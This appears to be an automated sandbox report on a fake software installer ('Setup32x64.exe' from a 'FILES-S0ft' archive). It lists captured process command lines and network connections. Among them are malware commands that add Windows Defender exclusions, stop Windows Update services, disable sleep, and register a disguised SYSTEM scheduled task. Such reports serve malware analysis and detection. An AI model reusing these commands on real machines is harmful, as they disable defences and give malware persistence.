C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --mojo-platform-channel-handle=9168 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=9236 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=8688 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --mojo-platform-channel-handle=6708 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --mojo-platform-channel-handle=9304 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10448 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7972 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7892 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9580 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10344 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x64-622.exe
"C:\Users\Admin\Downloads\winrar-x64-622.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\3fa25d8280f94a999541a062904a0f1a /t 6680 /p 7776
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9224 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7440 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10464 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10760 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9876 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\winrar-x64-622 (1).exe
"C:\Users\Admin\Downloads\winrar-x64-622 (1).exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=154 --mojo-platform-channel-handle=6560 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=155 --mojo-platform-channel-handle=8016 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=156 --mojo-platform-channel-handle=9860 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=158 --mojo-platform-channel-handle=4932 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=157 --mojo-platform-channel-handle=9024 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=159 --mojo-platform-channel-handle=8800 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10172 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\FILES-S0ft\" -ad -an -ai#7zMap5638:82:7zEvent10304
C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe
"C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe"
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\611877ca519b4bfbbd294e507598fbfb /t 8720 /p 8716
C:\ProgramData\19965126155501944123.exe
"C:\ProgramData\19965126155501944123.exe"
C:\ProgramData\86996301282502183715.exe
"C:\ProgramData\86996301282502183715.exe"
C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\delta1\mbupdatrV5.exe
"C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\delta1\mbupdatrV5.exe" "C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\config\UpdateControllerConfig.json" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE" "C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\staging" /db:dbupdate /su:no
C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe
"C:\Users\Admin\Downloads\FILES-S0ft\Setup32x64.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-0.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-1.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-2.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-3.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-4.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-5.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-6.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-7.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-8.exe
ig.exe reseed
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7424 -ip 7424
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-9.exe
ig.exe reseed
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7424 -s 1756
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-10.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-11.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-12.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-13.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-14.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-15.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-16.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-17.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-18.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-19.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-20.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-21.exe
ig.exe reseed
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-22.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-23.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-24.exe
ig.exe reseed
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-25.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-26.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-27.exe
ig.exe reseed
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-28.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-29.exe
ig.exe reseed
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-30.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-31.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-32.exe
ig.exe reseed
C:\Windows\System32\sc.exe
sc stop bits
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-33.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-34.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-35.exe
ig.exe reseed
C:\Windows\System32\sc.exe
sc stop dosvc
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-36.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-37.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-38.exe
ig.exe reseed
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ewltjtjow#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-39.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-40.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-41.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-42.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-43.exe
ig.exe reseed
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-44.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-45.exe
ig.exe reseed
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-46.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-47.exe
ig.exe reseed
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-48.exe
ig.exe reseed
C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\ig-49.exe
ig.exe reseed
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ewltjtjow#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 2.136.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.168.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| US | 8.8.8.8:53 | 206.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 131.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| NL | 142.251.39.106:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 106.39.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.malwarebytes.com | udp |
| NL | 65.9.86.5:443 | www.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 194.23.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.86.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.214.204.143.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dev.visualwebsiteoptimizer.com | udp |
| US | 34.96.102.137:443 | dev.visualwebsiteoptimizer.com | tcp |
| US | 34.96.102.137:443 | dev.visualwebsiteoptimizer.com | udp |
| US | 8.8.8.8:53 | 137.102.96.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | genesis.malwarebytes.com | udp |
| US | 54.86.62.92:443 | genesis.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | api.demandbase.com | udp |
| NL | 65.9.86.79:443 | api.demandbase.com | tcp |
| US | 8.8.8.8:53 | plausible.io | udp |
| IN | 103.180.115.10:443 | plausible.io | tcp |
| US | 8.8.8.8:53 | 92.62.86.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.86.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.115.180.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 88.221.25.169:80 | apps.identrust.com | tcp |
| NL | 142.251.39.106:443 | content-autofill.googleapis.com | udp |
| US | 34.96.102.137:443 | dev.visualwebsiteoptimizer.com | udp |
| US | 8.8.8.8:53 | 169.25.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.cookielaw.org | udp |
| US | 104.18.170.114:443 | cdn.cookielaw.org | tcp |
| IN | 103.180.115.10:443 | plausible.io | tcp |
| US | 8.8.8.8:53 | 114.170.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | unpkg.com | udp |
| US | 104.16.122.175:443 | unpkg.com | tcp |
| US | 104.18.170.114:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 104.18.28.38:443 | geolocation.onetrust.com | tcp |
| US | 8.8.8.8:53 | 175.122.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.28.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| NL | 157.240.247.8:443 | connect.facebook.net | tcp |
| US | 8.8.8.8:53 | www.redditstatic.com | udp |
| US | 8.8.8.8:53 | snap.licdn.com | udp |
| US | 8.8.8.8:53 | bat.bing.com | udp |
| US | 204.79.197.200:443 | bat.bing.com | tcp |
| NL | 95.101.74.227:443 | snap.licdn.com | tcp |
| US | 151.101.1.140:443 | www.redditstatic.com | tcp |
| US | 8.8.8.8:53 | www.upsellit.com | udp |
| US | 8.8.8.8:53 | munchkin.marketo.net | udp |
| US | 8.8.8.8:53 | static.ads-twitter.com | udp |
| NL | 199.232.148.157:443 | static.ads-twitter.com | tcp |
| US | 34.117.39.58:443 | www.upsellit.com | tcp |
| NL | 23.222.44.208:443 | munchkin.marketo.net | tcp |
| US | 8.8.8.8:53 | cdn.bizible.com | udp |
| US | 8.8.8.8:53 | www.estore.malwarebytes.com | udp |
| US | 152.199.2.76:443 | cdn.bizible.com | tcp |
| US | 8.8.8.8:53 | 8.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.148.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.39.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.44.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.linkedin.oribi.io | udp |
| US | 8.8.8.8:53 | px.ads.linkedin.com | udp |
| US | 8.8.8.8:53 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | tcp |
| US | 13.107.42.14:443 | px.ads.linkedin.com | tcp |
| NL | 52.222.139.95:443 | cdn.linkedin.oribi.io | tcp |
| US | 8.8.8.8:53 | 76.2.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.co | udp |
| US | 8.8.8.8:53 | analytics.twitter.com | udp |
| US | 104.244.42.195:443 | analytics.twitter.com | tcp |
| US | 104.244.42.133:443 | t.co | tcp |
| US | 8.8.8.8:53 | alb.reddit.com | udp |
| US | 151.101.1.140:443 | alb.reddit.com | tcp |
| US | 151.101.1.140:443 | alb.reddit.com | tcp |
| NL | 157.240.247.8:443 | connect.facebook.net | udp |
| US | 8.8.8.8:53 | analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 216.239.36.181:443 | analytics.google.com | tcp |
| NL | 142.250.102.157:443 | stats.g.doubleclick.net | tcp |
| US | 216.239.36.181:443 | analytics.google.com | tcp |
| US | 8.8.8.8:53 | 1.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.42.244.104.in-addr.arpa | udp |
| US | 216.239.36.181:443 | analytics.google.com | udp |
| US | 8.8.8.8:53 | 133.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.bizibly.com | udp |
| US | 8.8.8.8:53 | www.linkedin.com | udp |
| US | 8.8.8.8:53 | 181.36.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.102.250.142.in-addr.arpa | udp |
| NL | 142.250.102.157:443 | stats.g.doubleclick.net | udp |
| NL | 142.251.36.1:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | 805-usg-300.mktoresp.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 192.28.144.124:443 | 805-usg-300.mktoresp.com | tcp |
| NL | 157.240.247.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.144.28.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 35.165.137.241:443 | telemetry.malwarebytes.com | tcp |
| US | 8.8.8.8:53 | 241.137.165.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| FR | 2.23.13.53:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 53.13.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ark.mwbsys.com | udp |
| US | 54.90.223.157:443 | ark.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| NL | 52.222.139.37:443 | cdn.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 157.223.90.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.139.222.52.in-addr.arpa | udp |
| US | 54.90.223.157:443 | ark.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| NL | 52.222.139.37:443 | cdn.mwbsys.com | tcp |
| US | 54.90.223.157:443 | ark.mwbsys.com | tcp |
| NL | 52.222.139.37:443 | cdn.mwbsys.com | tcp |
| US | 54.90.223.157:443 | ark.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| NL | 52.222.139.37:443 | cdn.mwbsys.com | tcp |
| US | 54.90.223.157:443 | ark.mwbsys.com | tcp |
| US | 8.8.8.8:53 | cdn.mwbsys.com | udp |
| NL | 52.222.139.14:443 | cdn.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 14.139.222.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | w3-reporting-nel.reddit.com | udp |
| US | 151.101.1.140:443 | w3-reporting-nel.reddit.com | tcp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 202.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.48.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.8.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iris.mwbsys.com | udp |
| US | 3.234.104.16:443 | iris.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 16.104.234.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keystone.mwbsys.com | udp |
| US | 34.198.90.127:443 | keystone.mwbsys.com | tcp |
| US | 34.198.90.127:443 | keystone.mwbsys.com | tcp |
| US | 8.8.8.8:53 | 127.90.198.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | keystone.mwbsys.com | udp |
| US | 34.198.90.127:443 | keystone.mwbsys.com | tcp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | telemetry.malwarebytes.com | udp |
| US | 35.82.168.235:443 | telemetry.malwarebytes.com | tcp |
